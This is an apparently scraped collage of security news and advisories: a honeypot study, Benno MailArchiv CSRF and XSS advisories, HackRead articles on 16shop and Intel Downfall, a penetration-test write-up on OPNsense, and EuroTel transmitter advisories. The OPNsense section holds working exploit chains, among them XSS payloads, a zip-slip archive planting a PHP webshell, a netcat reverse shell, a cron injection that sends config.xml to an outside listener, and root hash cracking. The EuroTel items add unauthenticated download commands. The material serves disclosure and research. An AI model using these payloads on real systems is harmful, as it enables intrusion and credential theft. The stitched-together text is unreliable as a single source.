Security researchers set up a remote machine and recorded every move cybercriminals made—including their login details.

Plenty of people tried to access the system. Over the past three years, it has captured 21 million login attempts, with more than 2,600 successful logins by attackers brute-forcing the weak password they purposefully used on the system. They recorded 2,300 of these successful logins, gathered 470 files that were uploaded, and analyzed 339 of the videos with useful footage. (Some recordings were just a couple of seconds long, and proved less useful.) “We cataloged the techniques, the tooling, everything done on these systems,” Bilodeau says.

Bergeron and Bilodeau have grouped the attackers into five broad categories based on character types from the role-playing game Dungeons and Dragons. Most common were the rangers: once these attackers were inside the trap RDP session, they would immediately start exploring the system, removing Windows antivirus tools, delving into folders, looking at the network it was on and other elements of the machine. Rangers wouldn’t take any action, Bergeron says. “It's basic recon,” she says, suggesting they may be evaluating the system for others to enter it.

Barbarians were the next most frequent kind of attackers. These use multiple hacking tools, such as Masscan and NLBrute, to brute-force their way into other computers, the researchers say. They work through a list of IP addresses, usernames, and passwords, trying to break into the machines. Similarly, the group they call wizards use their access to the RDP to launch attacks against other insecure RDPs—potentially masking their identity across many layers. “They use the RDP access as a portal to connect to other computers,” Bergeron says.

The thieves, meanwhile, do what their name implies. They try to make money out of the RDP access in any way possible. They use traffic monetization websites and install crypto miners, the researchers say. They might not earn a lot in one go, but multiple compromises can add up.

The final group Bergeron and Bilodeau observed is the most haphazard: the bards. These people, the researchers say, may have purchased access to the RDP and are using it for a variety of reasons. One person the researchers watched Googled the “strongest virus ever,” Bergeron says, while another tried to access Google Ads.

Others simply tried (and failed) to find porn. “We can see the beginner level he is in, as he searched for porn on YouTube—nothing appears, of course,” Bergeron says, since YouTube doesn’t permit pornography. Multiple sessions were spotted trying to access porn, the researchers say, and these users were always writing in Farsi, indicating they may be trying to access porn in places where it is blocked. (The researchers weren’t able to determine conclusively where many of those accessing the RDP were doing so from.)

Despite this, watching the attackers reveals the way they behave, including some more peculiar actions. Bergeron, who has a PhD in criminology, says the attackers were sometimes “very slow” at doing their work. Often she was “getting impatient” while watching them, she says. “I’m like: ‘Come on, you're not good at that’ or 'Go faster’ or ‘Go deeper,’ or ‘You can do better.’”

A Clever Honeypot Tricked Hackers Into Revealing Their Secrets

A CSRF issue was discovered in LWsystems Benno MailArchiv 2.10.1.

August 9, 2023

The Benno MailArchiv Web-App (benno-web prior 2.1.0.2) is vulnerable to Cross-Site-Request-Forgery.

To exploit the vulnerability the attacker sends a link to a prepared page to a Benno MailArchiv user. The link then is able to trigger actions in the name of the user such as changing the users password (if the user is logged in).

<form action="https://benno.host/admin.php?CA=changePassword" method="post">
<input type="text" name="CA" value="savePassword">
<input type="password" class="input\_text" name="data\[password0\]" value="test123">
<input type="password" class="input\_text" name="data\[password1\]" value="test123">
<input type="password" class="input\_text" name="data\[addresses\]" value='\[{"value":"\*@\*"}\]'>

</form>

<script>
  document.forms\[0\].submit();
</script>

CVE-2023-38348: XSRF in Benno MailArchiv Web-App (benno-web < 2.10.2) (CVE-2023-38348)

An issue was discovered in LWsystems Benno MailArchiv 2.10.1. Attackers can cause XSS via JavaScript content to a mailbox.

August 9, 2023 Sebastian

The Benno MailArchiv Web-App is vulnerable to cross-site-scripting if benno-rest-lib / benno-rest prior 2.10.1 is used.

To exploit the vulnerability the attacker sends an email containing malicious javascript to an mailbox which is archived by Benno MailArchiv. When a user logs into the Benno Web-App and views the malicious e-mail, the javascript is executed.

echo '<script>alert(1)</script>' | mail -s "$(echo -e "This is the subject\\nContent-Type: text/html")" victim@domain.tld

CVE-2023-38347: XSS in Benno MailArchiv Web-App (benno-rest-lib – Sebastian's Blog

By Waqas
The cybercrime platform 16shop sold hacking tools and other malicious tools used to compromise more than 70,000 users in 43 countries.
This is a post from HackRead.com Read the original post: INTERPOL Dismantles Infamous ’16shop’ Phishing-as-a-Service Platform

*   **INTERPOL Dismantles ’16shop’:** Global effort leads to arrests in Indonesia and Japan, targeting notorious phishing platform.
*   **Successful Intelligence Sharing:** Cooperation between INTERPOL, law enforcement, and private partners demonstrates effective global cybercrime fighting.
*   **Wide-reaching Phishing Impact:** ’16shop’ exploited victims worldwide with phishing kits, showcasing the pervasive threat of such attacks.
*   **Phishing Dominance:** Phishing responsible for up to 90% of data breaches, necessitating urgent countermeasures.
*   **Collective Defense:** Collaboration among law enforcement and industry remains crucial in battling evolving cyber threats.

In a remarkable feat of international collaboration, INTERPOL has successfully dismantled the nefarious ’16shop’ phishing-as-a-service (PaaS) platform, culminating in the arrest of its operator and two facilitators.

The joint effort between law enforcement agencies and private sector partners demonstrates the power of shared intelligence in combating cybercrime on a global scale. This comes days after INTERPOL managed to shut down a decade-old child abuse network during **Operation Narsil**.

**Targeting the Heart of Phishing Operations**

The ’16shop’ platform offered so-called ‘phishing kits’ to hackers eager to exploit unsuspecting Internet users through email scams. Victims were tricked into sharing sensitive information, including credit card details, by clicking on malicious pdf files or links. These ill-gotten gains were then used to defraud victims of their hard-earned money.

Phishing attacks remain the most prevalent cyber threat worldwide, responsible for up to 90 percent of data breaches. The success of such attacks highlights the urgency of tackling this pervasive issue.

C2 server of 16shop and an Amazon phishing page available on the site

**International Partnerships at Work**

According to INTERPOL’s press release, the successful takedown of ’16shop’ was the result of a comprehensive operation involving INTERPOL, Indonesian authorities, and counterparts in Japan and the United States. Private sector entities such as Cyber Defense Institute, Group-IB, Palo Alto Networks Unit 42, Trend Micro, and Cybertoolbelt also played instrumental roles.

**“Borderless Cyber Impact”**

Bernardo Pillot, Assistant Director of Cybercrime Operations at INTERPOL, emphasized the tangible impact of cyberattacks on victims. He stated, “Cyberattacks such as phishing may be borderless and virtual in nature, but their impact on victims is real and devastating.”

**Unravelling the Web of Cybercrime**

The investigation began with the identification of ’16shop’ by INTERPOL’s cybercrime analysts during a project focusing on cyber threats in the ASEAN region. Collaboration with private sector partners allowed the team to pinpoint the platform’s administrator based in Indonesia.

Leveraging connections with the United States, INTERPOL coordinated with US law enforcement agencies to provide crucial information to Indonesian investigators. This joint effort led to the arrest of the platform’s 21-year-old administrator and the confiscation of electronic devices and luxury vehicles.

**Unmasking Facilitators and Future Prevention**

The successful capture of the administrator in Indonesia catalyzed further cooperation between Japanese and Indonesian authorities, leading to the arrest of two facilitators. This meticulous unravelling of the criminal network highlights the collective determination to curtail cybercrime.

Brigadier General Adi Vivid Agustiadi Bachtiar, Director of the Indonesian National Police’s Cyber Crime Investigation, underscored the significance of the operation. “This operation is only successful as we work closely with various stakeholders… to stop the crime-ware being offered as a service and also stopping more people from falling victim to phishing attacks,” he stated.

**Coherent Intelligence for a Safer Cyberspace**

INTERPOL’s cybercrime directorate serves as a critical hub for experts from law enforcement and industry to analyze and disseminate actionable intelligence on cyber threats. This united approach underscores the need for ongoing collaboration to combat the ever-evolving landscape of cybercrime.

**RELATED ARTICLES**

1.  SSNDOB Cybercrime Marketplace Seized in Intl. Operation
2.  Researcher Exposes Crypto Scam Network of 300 Domains
3.  Ukraine Busts Gang for Massive $4.3 Million Phishing Scams
4.  Microsoft seizes 99 sites used by Iranians for phishing attacks
5.  Domain, server of DoubleVPN used by ransomware gangs seized

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

INTERPOL Dismantles Infamous ’16shop’ Phishing-as-a-Service Platform

By Habiba Rashid
New Intel Processor Vulnerability "Downfall" Discovered: Threats to Data Security Amplify
This is a post from HackRead.com Read the original post: Intel Responds to ‘Downfall’ Attack with Firmware Updates, Urges Mitigation

*   **‘Downfall’ Attack Unveiled:** Google researchers reveal a new side-channel attack called “Downfall” targeting Intel processors, exposing a memory optimization vulnerability (CVE-2022-40982).
*   **Cloud Impact:** The attack extends into cloud environments, enabling attackers to extract data from shared cloud computers, intensifying data breach risks.
*   **Memory Optimization Flaw:** The vulnerability originates from Intel processors’ memory optimization features, inadvertently revealing internal hardware registers to software.
*   **Attack Techniques:** The attack employs Gather Data Sampling (GDS) and Gather Value Injection (GVI) to steal CPU data and manipulate microarchitectural data injections.
*   **Mitigations and Implications:** Intel responds with firmware updates to address the vulnerability, but performance overhead concerns remain. ‘Downfall’ underlines the vulnerability of modern microprocessors, resonating with industry-wide concerns.

Google researchers have uncovered a new side-channel attack known as “Downfall” targeting Intel processors. This attack, discovered by Google senior research scientist Daniel Moghimi, exposes a vulnerability tracked as CVE-2022-40982, exploiting a memory optimization feature in Intel processors.

Downfall joins the league of attacks that can be exploited by local attackers or malware to access sensitive information, including passwords and encryption keys, of affected device users.

Moghimi’s findings unveil a disconcerting aspect of Intel processors, revealing that transient execution attacks like Downfall extend their reach even into cloud environments. This enables malicious actors to pilfer data from other users sharing the same cloud computer, significantly raising the stakes of data breaches.

The underlying flaw stems from memory optimization features inherent in Intel processors, inadvertently disclosing internal hardware registers to software. This exposure facilitates unauthorized software access to data that should remain shielded from such access.

The pivotal culprit in this scenario is the “Gather” instruction, intended to expedite the retrieval of scattered memory data. However, Moghimi ingeniously demonstrated how this instruction leaks the contents of the internal vector register file during speculative execution, thereby opening up avenues for cybercriminals.

Two specific attack techniques were developed as part of the Downfall (research paper PDF) exploit – Gather Data Sampling (GDS) and Gather Value Injection (GVI). The former method facilitates the theft of data from CPU components, while the latter manipulates the data leaks for microarchitectural data injections. The practicality of GDS is underscored by Moghimi’s creation of a proof-of-concept (PoC) exploit, capable of pilfering encryption keys from OpenSSL.

This clip shows how attacks can steal 128-bit and 256-bit AES keys from another user:

Notably, the Downfall attack doesn’t discriminate between endpoint devices and cloud infrastructure. While cloud environments provide a broader landscape for potential attacks, Moghimi emphasized the significant threat Downfall poses to personal computers. Theoretically, the exploit could even be executed via a web browser, although this possibility necessitates further research and validation.

To counteract the impending threats posed by Downfall, Intel has swiftly responded by publishing a security advisory and releasing firmware updates. These mitigations come as microcode updates designed to address CVE-2022-40982, which Intel has classified as having “medium severity.”

The updates intend to thwart the data leakage intrinsic to the Gather instruction, although they come with a trade-off of potential performance overhead, which could be as high as 50% in some workloads. Despite this drawback, experts unanimously advocate for the implementation of these fixes to safeguard against potential breaches.

Intel’s recent woes are not exclusive, as the Downfall attack highlights the vulnerability of modern microprocessors. Notably, Google researchers also unveiled “Zenbleed,” a vulnerability afflicting AMD Zen 2 processors, reiterating the broader implications of such vulnerabilities across the industry.

The disclosure of Downfall coincides with the revelation of another processor vulnerability named “Inception” by researchers at ETH Zurich. Inception targets devices powered by AMD Zen processors, allowing attackers to manipulate the CPU’s predictive algorithms to access sensitive data.

**RELATED ARTICLES**

1.  Hackers Targeting Apple’s M1 Chip with Mac Malware
2.  Intel chip flaw left cars, medical and IoT devices vulnerable
3.  Intel chip flaw “Foreshadow” attacks SGX tech to extract data
4.  Chip Flaws Impacting Microsoft, Lenovo, and Samsung Devices
5.  All Nintendo Switch Consoles Contain Unpatchable Chip-Level Flaw

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Intel Responds to ‘Downfall’ Attack with Firmware Updates, Urges Mitigation

A command injection vulnerability in the component /api/cron/settings/setJob/ of OPNsense before 23.7 allows attackers to execute arbitrary system commands.

Recently we performed a non-profit penetration test of OPNsense - an open source, FreeBSD based firewall and routing platform with ~51.47K active instances according to censys.io. The assessment was focused on web GUI and API as well as some parts of the system backend. Work has been carried out in a period from June 12 to June 26, 2023. In total, around 120 hours were committed to the project.

During the test we managed to find many interesting and varied vulnerabilities, e.g., Cross-Site Scripting, Cross-Site Request Forgery, Open Redirect, Insecure Permissions, OS Command Injection and Zip-Slip which eventually leads to root shell. You can find all of them in the Full PDF Report which is also a great example of what our commercial clients receive.

We would like to show you three scenarios of how vulnerabilities that we found could be chained together to perform attacks on the OPNsense instance.

**Scenario 1 - Reflected XSS leads to root RCE via Zip-Slip**

In this scenario we used Reflected Cross-Site Scripting vulnerability (LT-0017) to deliver our payload to the administrator. Sending GET request to https://opnsense/ui/cron/item/open/0'+alert(window.origin)+' would result in the following response:

    <!doctype html>
    <html lang="en-US" class="no-js">
      <head>
    [...]
    <script>
    [...]
    	openDialog('0'+alert(window.origin)+'');
    [...]

After an administrator clicks on our link, we need to send six requests from their browser. First two requests create new Captive Portal template, another three enable Captive Portal with the selected template, and the last one spawns netcat reverse shell with our brand-new luta.php webshell.

**Example Javascript payload:**

    let requestData = {"name":"zipslip","content":"UEsDBAoAAAAAAJOO5VYdoS5KEAAAABAAAAA3ABwALi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vdXNyL2xvY2FsL3d3dy9sdXRhLnBocFVUCQADxZGlZPyPpWR1eAsAAQQAAAAABAAAAAA8Pz1gJF9HRVRbeF1gPz4KUEsDBAoAAAAAAEGO5VYAAAAAAAAAAAAAAAAEABwAY3NzL1VUCQADKpGlZCuRpWR1eAsAAQToAwAABOgDAABQSwMEFAAAAAgAMn7lVqx0FrPKAAAAvQEAAAwAHABleGNsdWRlLmxpc3RVVAkAA/B0pWSLkaVkdXgLAAEE6AMAAAToAwAAjY8xbsMwDEV3nYJAhk5RgN6gd+gFZJeSmVKiQdJRffvKKbpk8sjPx/8/L/C5kAGTOczSPFEz8AUhE2NLFY8pOdS0QxOHCUEeqF3JHRtM+xPeDBX6MoRZMTm1AvNmLhUc68rJ0WK4wAcz0FAMqI27/9wu7e3pPC4Uv/6WeNTJVOJP5SNGNoWso1AX/Q6z2W0ScXNNaxxTrGl9USu1YxPyeMtuhfd1oeFp1yVx5tHRropl46QRxc9g9ihnMPd8BuuST3Pv4f762t3CL1BLAwQKAAAAAABEjuVWAAAAAAAAAAAAAAAABgAcAGZvbnRzL1VUCQADL5GlZDCRpWR1eAsAAQToAwAABOgDAABQSwMECgAAAAAASo7lVgAAAAAAAAAAAAAAAAcAHABpbWFnZXMvVVQJAAM8kaVkQZGlZHV4CwABBOgDAAAE6AMAAFBLAwQKAAAAAABTjuVW5yL1pwQAAAAEAAAACgAcAGluZGV4Lmh0bWxVVAkAA06RpWSLkaVkdXgLAAEE6AMAAAToAwAAcG9jClBLAwQKAAAAAABPjuVWAAAAAAAAAAAAAAAAAwAcAGpzL1VUCQADRZGlZEaRpWR1eAsAAQToAwAABOgDAABQSwECHgMKAAAAAACTjuVWHaEuShAAAAAQAAAANwAYAAAAAAABAAAApIEAAAAALi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vdXNyL2xvY2FsL3d3dy9sdXRhLnBocFVUBQADxZGlZHV4CwABBAAAAAAEAAAAAFBLAQIeAwoAAAAAAEGO5VYAAAAAAAAAAAAAAAAEABgAAAAAAAAAEADtQYEAAABjc3MvVVQFAAMqkaVkdXgLAAEE6AMAAAToAwAAUEsBAh4DFAAAAAgAMn7lVqx0FrPKAAAAvQEAAAwAGAAAAAAAAQAAAICBvwAAAGV4Y2x1ZGUubGlzdFVUBQAD8HSlZHV4CwABBOgDAAAE6AMAAFBLAQIeAwoAAAAAAESO5VYAAAAAAAAAAAAAAAAGABgAAAAAAAAAEADtQc8BAABmb250cy9VVAUAAy+RpWR1eAsAAQToAwAABOgDAABQSwECHgMKAAAAAABKjuVWAAAAAAAAAAAAAAAABwAYAAAAAAAAABAA7UEPAgAAaW1hZ2VzL1VUBQADPJGlZHV4CwABBOgDAAAE6AMAAFBLAQIeAwoAAAAAAFOO5VbnIvWnBAAAAAQAAAAKABgAAAAAAAEAAACAgVACAABpbmRleC5odG1sVVQFAANOkaVkdXgLAAEE6AMAAAToAwAAUEsBAh4DCgAAAAAAT47lVgAAAAAAAAAAAAAAAAMAGAAAAAAAAAAQAO1BmAIAAGpzL1VUBQADRZGlZHV4CwABBOgDAAAE6AMAAFBLBQYAAAAABwAHAEsCAADVAgAAAAA="}
    ajaxCall("/api/captiveportal/service/saveTemplate", requestData, () => {
    	ajaxCall("/api/captiveportal/service/reconfigure", {}, () => {
    		ajaxCall("/api/captiveportal/service/searchTemplates", {"current":1,"rowCount":7,"sort":{},"searchPhrase":"zipslip"}, (data, status) => {
    			let requestData = {"zone":{"enabled":"1","interfaces":"lan","authservers":"Local Database","alwaysSendAccountingReqs":"0","authEnforceGroup":"","idletimeout":"0","hardtimeout":"0","concurrentlogins":"1","certificate":"","servername":"","allowedAddresses":"","allowedMACAddresses":"","transparentHTTPProxy":"0","transparentHTTPSProxy":"0","extendedPreAuthData":"0","template":data.rows[0].uuid,"description":"poc"}}
    			ajaxCall("/api/captiveportal/settings/addZone/", requestData, () => {
    				ajaxCall("/api/captiveportal/service/reconfigure", {}, () => {
    					ajaxCall("/luta.php?x=rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc 192.168.1.118 1337 >/tmp/f", null, null)
    				})
    			})
    		})
    	})
    })

Above script can be base64 encoded and put inside the URL:

    https://opnsense/ui/cron/item/open/0'+eval(atob('bGV0IHJlcXVlc3REYXRhID0geyJuYW1[...]gkJCQl9KQoJCQl9KQoJCX0pCgl9KQp9KQo='))+'

What’s interesting is that the application accepts templates in ZIP format, and then it extracts all of their contents to the template directory. However, the way in which the application extracts the files makes it vulnerable to the Zip-Slip attack (LT-0014):

    # source: src/opnsense/scripts/OPNsense/CaptivePortal/overlay_template.py
    with zipfile.ZipFile(input_data, mode='r', compression=zipfile.ZIP_DEFLATED) as zf_in:
        for zf_info in zf_in.infolist():
            if zf_info.filename[-1] != '/':
                target_filename = '%s%s' % (target_directory, zf_info.filename)
                file_target_directory = '/'.join(target_filename.split('/')[:-1])
                if not os.path.isdir(file_target_directory):
                    os.makedirs(file_target_directory)
                with open(target_filename, 'wb') as f_out:
                    f_out.write(zf_in.read(zf_info.filename))
                os.chmod(target_filename, 0o444)

By using ../ sequences it is possible to extract files to other directories. This allows us to extract PHP file to the web root - /usr/local/www.

Our ZIP archive looks like this, where luta.php is a simple PHP web shell:

    Archive:  zipslip.zip
      Length      Date    Time    Name
    ---------  ---------- -----   ----
           16  2023-07-05 17:52   ../../../../../../../../../../../usr/local/www/luta.php
            0  2023-07-05 17:50   css/
          445  2023-07-05 15:49   exclude.list
            0  2023-07-05 17:50   fonts/
            0  2023-07-05 17:50   images/
            4  2023-07-05 17:50   index.html
            0  2023-07-05 17:50   js/
    ---------                     -------
          465                     7 files

Since the PHP process is being ran as a root user, the shell is granted root privileges as well.

**Proof of Concept Video:****Scenario 2 - Reflected XSS -> OS Command Injection -> root password retrieval via config.xml insecure permissions**

In the second scenario the payload is also delivered through Reflected XSS, but this time the vulnerability is introduced in Certificates tab (LT-0002). Sending request to https://opnsense/system_certmanager.php?act=%22%3E%3Csvg/onload=alert(window.origin)%3E&id=0 results in the following response body:

    <!doctype html>
    <html lang="en-US" class="no-js">
    [...]
    <form method="post" name="iform" id="iform"><input type="hidden" name="N3p4b1ZZUXpTc2VFWmFaLzRHQW5Ydz09" value="VUlyWVI0bWkyYkdjWDNvVGprQ1F2UT09" autocomplete="new-password" />
      <input type="hidden" name="id" id="id" value="0"/>
      <input type="hidden" name="act" id="action" value=""><svg/onload=alert(window.origin)>"/>
    </form>
    [...]

We want to send request to /api/cron/settings/addJob/ in order to add new cron job. The application allows only specific commands to be executed via cron, however, by including single quotes (') and newline character (\n) in the command parameters, we can define completely separate cron job and execute any command as nobody user (LT-0016).

**Example Javascript payload:**

    let requestData = {"job":{"enabled":"1","minutes":"*","hours":"*","days":"*","months":"*","weekdays":"*","command":"firmware auto-update","parameters":"'\n*\t*\t*\t*\t* curl -F config=@/conf/config.xml 192.168.1.118:1337 #'","description":"poc2"}}
    setTimeout(() => {
    	ajaxCall("/api/cron/settings/addJob/", requestData, () => {
    		ajaxCall("/api/cron/service/reconfigure", {}, () => {
    		})
    	})
    }, 1000)

…and turned into an URL:

    https://opnsense/system_certmanager.php?act=%22%3E%3Csvg/onload=eval(atob(%27bGV0IHJlcXVlc3REYXRh[...]HsKCQl9KQoJfSkKfSwgMTAwMCk=%27))%3E&id=0

After the administrator opens the link, we can see our command added to the crontab:

    root@OPNsense:~ # cat /var/cron/tabs/nobody
    # DO NOT EDIT THIS FILE -- OPNsense auto-generated file
    #
    # User-defined crontab files can be loaded via /etc/cron.d
    # or /usr/local/etc/cron.d and follow the same format as
    # /etc/crontab, see the crontab(5) manual page.
    SHELL=/bin/sh
    PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
    #minute	hour	mday	month	wday	command
    # Origin/Description: cron/poc2
    *	*	*	*	*	/usr/local/sbin/configctl -d firmware auto-update '
    *	*	*	*	* curl -F config=@/conf/config.xml 192.168.1.118:1337 #'

In the above payload we are adding next vulnerability to the chain - even though we only have privileges of user nobody, insecure permissions (LT-0003) grant us read access to the configuration file:

    root@OPNsense:/conf # ls -la
    total 112
    drwxr-xr-x   4 root  wheel    512 Jul 31 12:41 .
    drwxr-xr-x  21 root  wheel   1024 Jul 31 12:44 ..
    drwxr-xr-x   2 root  wheel   4096 Jul 31 14:13 backup
    -rw-r-----   1 root  wheel  49152 Jul 31 12:41 captiveportal.sqlite
    -rw-r--r--   1 root  wheel  39796 Jul 31 14:13 config.xml
    -rw-r-----   1 root  wheel    383 Jul 31 12:41 dhcpleases.tgz
    -rw-r-----   1 root  wheel     40 Jul 31 14:13 event_config_changed.json
    drwxr-xr-x   2 root  wheel    512 Jul  5 12:40 sshd

Soon config.xml is sent to our listener:

    feliks@debian ~> nc -lkp 1337
    POST / HTTP/1.1
    Host: 192.168.1.118:1337
    User-Agent: curl/7.87.0
    Accept: */*
    Content-Length: 39119
    Content-Type: multipart/form-data; boundary=------------------------06c60d07c2a2ae1e
    
    --------------------------06c60d07c2a2ae1e
    Content-Disposition: form-data; name="config"; filename="config.xml"
    Content-Type: application/xml
    
    <?xml version="1.0"?>
    <opnsense>
      <theme>opnsense</theme>
      <sysctl>
    [...]
        <user>
          <name>root</name>
          <descr>System Administrator</descr>
          <scope>system</scope>
          <groupname>admins</groupname>
          <password>$2y$10$YRVoF4SgskIsrXOvOQjGieB9XqHPRra9R7d80B3BZdbY/j21TwBfS</password>
          <uid>0</uid>
        </user>
    [...]

Congratulations, it’s a bcrypt hash of a root password!

Finally, we feed it to hashcat:

    feliks@debian ~> hashcat -m 3200 '$2y$10$YRVoF4SgskIsrXOvOQjGieB9XqHPRra9R7d80B3BZdbY/j21TwBfS' -a 0 wordlist.txt
    hashcat (v6.1.1) starting...
    
    [...]
    
    $2y$10$YRVoF4SgskIsrXOvOQjGieB9XqHPRra9R7d80B3BZdbY/j21TwBfS:opnsense
                                                     
    Session..........: hashcat
    Status...........: Cracked
    Hash.Name........: bcrypt $2*$, Blowfish (Unix)
    Hash.Target......: $2y$10$YRVoF4SgskIsrXOvOQjGieB9XqHPRra9R7d80B3BZdbY...1TwBfS
    Time.Started.....: Mon Jul 31 17:04:47 2023 (0 secs)
    Time.Estimated...: Mon Jul 31 17:04:47 2023 (0 secs)
    Guess.Base.......: File (wordlist.txt)
    Guess.Queue......: 1/1 (100.00%)
    Speed.#1.........:       10 H/s (3.82ms) @ Accel:2 Loops:64 Thr:1 Vec:8
    Recovered........: 1/1 (100.00%) Digests
    Progress.........: 6/6 (100.00%)
    Rejected.........: 0/6 (0.00%)
    Restore.Point....: 0/6 (0.00%)
    Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:960-1024
    Candidates.#1....: luta -> opnsense
    
    Started: Mon Jul 31 17:04:13 2023
    Stopped: Mon Jul 31 17:04:48 2023

**Scenario 3 - CSRF that halts the firewall**

This one is quite straightforward. Administrator visits our website, from which we redirect them to https://opnsense/api/core/system/halt, to turn off the instance. Normally, this request is made using POST method and requires CSRF token, but during the test it turned out that the app accepts GET request as well, and in such case doesn’t require CSRF token.

As a result, the OPNsense instance turns off.

**Proof of Concept Video:****Closing thoughts**

We reported found vulnerabilities to OPNsense maintainers and we really want to thank them for a great response. They handled the whole process very professionally, quickly prepared effective patches for many vulnerabilities and included them in the newest release - OPNsense 23.7 “Restless Roadrunner”. Also, they provided us with reasoning behind decision to not patch some of them right now.

We are very happy about the outcome of the tests and can’t wait to start another project like this soon. Stay tuned!

**Full list of found vulnerabilities**

1.  LT-0001: Using GET method to modify application state
2.  LT-0002: Reflected Cross-Site Scripting - Certificates - act
3.  LT-0003: Insecure directory permissions - /conf/
4.  LT-0004: Reflected Cross-Site Scripting - Log Files - /ui/diagnostics/log/core/
5.  LT-0005: Open Redirect - Login
6.  LT-0006: Services run as root
7.  LT-0007: Insecure temporary file storage - /tmp/ usage
8.  LT-0008: Command injection - Backups - diag\_backup.php
9.  LT-0009: Custom message injection - system\_usermanager.php
10.  LT-0010: Improper error handling
11.  LT-0011: Lack of input sanitization - crash\_reporter.php
12.  LT-0013: Insecure permissions - configd.socket
13.  LT-0014: Zip-slip in Captive Portal template upload leads to Remote Code Execution
14.  LT-0015: Verbose error messages
15.  LT-0016: Command injection - Cron - /api/cron/settings/setJob/
16.  LT-0017: Reflected Cross-Site Scripting - Cron - /ui/cron/item/open/

**Timeline**

*   27.06.2023 Vulnerabilities reported to OPNsense
*   27.06.2023 Report acknowledged
*   28.06 - 05.07.2023 Vendor fixed the vulnerabilities
*   12.07 Retest
*   17.07.2023 End of vulnerabilities disclosure process - reported issues are fixed or otherwise handled
*   31.07.2023 OPNsense 23.7 Released

CVE-2023-39008: LogicalTrust - [EN] A-Z: OPNsense - Penetration Test

The EuroTel ETL3100 TV and FM transmitters suffer from an unauthenticated configuration and log download vulnerability. This will enable the attacker to disclose sensitive information and help him in authentication bypass, privilege escalation and full system access.

    EuroTel ETL3100 Transmitter Unauthenticated Config/Log Download VulnerabilityVendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.LProduct web page: https://www.eurotel.it | https://www.siel.fmAffected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)                   v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)Summary: RF Technology For Television Broadcasting Applications.The Series ETL3100 Radio Transmitter provides all the necessaryfeatures defined by the FM and DAB standards. Two bands are providedto easily complain with analog and digital DAB standard. The SeriesETL3100 Television Transmitter provides all the necessary featuresdefined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, aswell as the analog TV standards. Three band are provided to easilycomplain with all standard channels, and switch softly from analog-TV'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.Desc: The TV and FM transmitter suffers from an unauthenticatedconfiguration and log download vulnerability. This will enablethe attacker to disclose sensitive information and help him inauthentication bypass, privilege escalation and full system access.Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)           lighttpd/1.4.26           PHP/5.4.3           Xilinx Virtex MachineVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5784Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5784.php29.04.2023--$ curl http://192.168.2.166/cfg_download.php -o config.tgz$ curl http://192.168.2.166/exciter/log_download.php -o log.tar.gz

EuroTel ETL3100 Transmitter Information Disclosure

The EuroTel ETL3100 transmitter is vulnerable to insecure direct object references that occur when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access the hidden resources on the system and execute privileged functionalities.

**EuroTel ETL3100 Transmitter Authorization Bypass / Insecure Direct Object Reference**

**EuroTel ETL3100 Transmitter Authorization Bypass / Insecure Direct Object Reference**

    EuroTel ETL3100 Transmitter Authorization Bypass (IDOR)Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.LProduct web page: https://www.eurotel.it | https://www.siel.fmAffected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)                   v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)Summary: RF Technology For Television Broadcasting Applications.The Series ETL3100 Radio Transmitter provides all the necessaryfeatures defined by the FM and DAB standards. Two bands are providedto easily complain with analog and digital DAB standard. The SeriesETL3100 Television Transmitter provides all the necessary featuresdefined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, aswell as the analog TV standards. Three band are provided to easilycomplain with all standard channels, and switch softly from analog-TV'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.Desc: The application is vulnerable to insecure direct object referencesthat occur when the application provides direct access to objects basedon user-supplied input. As a result of this vulnerability attackers canbypass authorization and access the hidden resources on the system andexecute privileged functionalities.Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)           lighttpd/1.4.26           PHP/5.4.3           Xilinx Virtex MachineVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5783Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5783.php29.04.2023--See URL:TARGET/exciter.php?page=0TARGET/exciter.php?page=1TARGET/exciter.php?page=2......TARGET/exciter.php?page=29TARGET/exciter.php?page=30TARGET/exciter.php?page=31

EuroTel ETL3100 Transmitter Authorization Bypass / Insecure Direct Object Reference

EuroTel ETL3100 transmitters use a weak set of default administrative credentials that can be guessed in remote password attacks and gain full control of the system.

